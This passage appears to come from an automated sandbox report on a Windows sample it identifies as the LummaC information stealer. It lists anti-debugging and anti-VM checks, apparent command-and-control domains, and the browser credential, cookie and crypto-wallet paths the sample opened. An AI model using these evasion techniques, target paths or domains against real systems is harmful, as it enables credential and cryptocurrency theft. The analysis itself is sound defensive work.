          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0D5B second address: 4EB0D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0D5F second address: 4EB0D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0D65 second address: 4EB0D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0DD8 second address: 4EB0E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test al, al 0x00000008 jmp 00007F1FDD1C1447h 0x0000000d je 00007F204DD94FC4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop esi 0x00000018 pushfd 0x00000019 jmp 00007F1FDD1C1447h 0x0000001e sub ch, FFFFFF8Eh 0x00000021 jmp 00007F1FDD1C1449h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06E0 second address: 4ED06E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06E6 second address: 4ED06EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06EA second address: 4ED0713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1FDD1C1215h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0713 second address: 4ED0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C143Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0723 second address: 4ED078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1FDD1C120Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1FDD1C120Dh 0x00000016 sbb cl, FFFFFFD6h 0x00000019 jmp 00007F1FDD1C1211h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F1FDD1C120Eh 0x00000027 xchg eax, esi 0x00000028 jmp 00007F1FDD1C1210h 0x0000002d push eax 0x0000002e pushad 0x0000002f mov ecx, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ax, dx 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED078A second address: 4ED079A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 mov edi, 657E1622h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED079A second address: 4ED0844 instructions: 0x00000000 rdtsc 0x00000002 mov dx, CB88h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov di, 83A0h 0x00000011 mov bx, 39CCh 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1FDD1C1211h 0x0000001f or ax, FAA6h 0x00000024 jmp 00007F1FDD1C1211h 0x00000029 popfd 0x0000002a mov ecx, 2C2D6DD7h 0x0000002f popad 0x00000030 je 00007F204DD7EDDBh 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F1FDD1C1218h 0x0000003d and cx, 4B78h 0x00000042 jmp 00007F1FDD1C120Bh 0x00000047 popfd 0x00000048 popad 0x00000049 cmp dword ptr [75AF459Ch], 05h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F1FDD1C120Eh 0x00000059 sub esi, 67CBE5D8h 0x0000005f jmp 00007F1FDD1C120Bh 0x00000064 popfd 0x00000065 mov cx, D48Fh 0x00000069 popad 0x0000006a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0844 second address: 4ED0898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F204DD9707Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 mov di, 3038h 0x00000016 push edi 0x00000017 pop esi 0x00000018 popad 0x00000019 call 00007F1FDD1C143Dh 0x0000001e pushfd 0x0000001f jmp 00007F1FDD1C1440h 0x00000024 sbb esi, 32472A98h 0x0000002a jmp 00007F1FDD1C143Bh 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov bx, A9E0h 0x0000003a popad 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED092C second address: 4ED0980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1FDD1C1211h 0x00000010 sbb ch, 00000016h 0x00000013 jmp 00007F1FDD1C1211h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F1FDD1C1210h 0x0000001f sub ax, 4338h 0x00000024 jmp 00007F1FDD1C120Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
          Tries to evade debugger and weak emulator (self modifying code)
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7FEC70 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9AB7B4 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6476Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6476Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, 00000000.00000002.2172764951.000000000098D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096488504.00000000058A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: file.exe, 00000000.00000003.2172028798.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125906580.000000000100C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144607854.000000000100C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174079269.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140689399.000000000100C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2169569460.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
          Source: file.exe, file.exe, 00000000.00000002.2174079269.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2173779051.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144607854.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2169569460.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140689399.0000000001015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2096488504.00000000058A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: file.exe, 00000000.00000002.2172764951.000000000098D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: file.exe, 00000000.00000003.2096580934.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (window names)
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          LummaC encrypted strings found
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: scriptyprefej.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: navygenerayk.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: founpiuer.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacedmny.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: thumbystriw.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: fadehairucw.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crisiwarny.store
          Source: file.exe, 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: presticitpo.store
          Source: file.exe, 00000000.00000002.2172907899.00000000009D2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: fProgram Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6764, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
          Source: file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: file.exe, 00000000.00000003.2169490945.0000000001062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
          Source: file.exe, 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: file.exe, 00000000.00000003.2125575887.000000000106D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
          Source: file.exe, 00000000.00000003.2125575887.000000000106D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.2125575887.000000000106D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
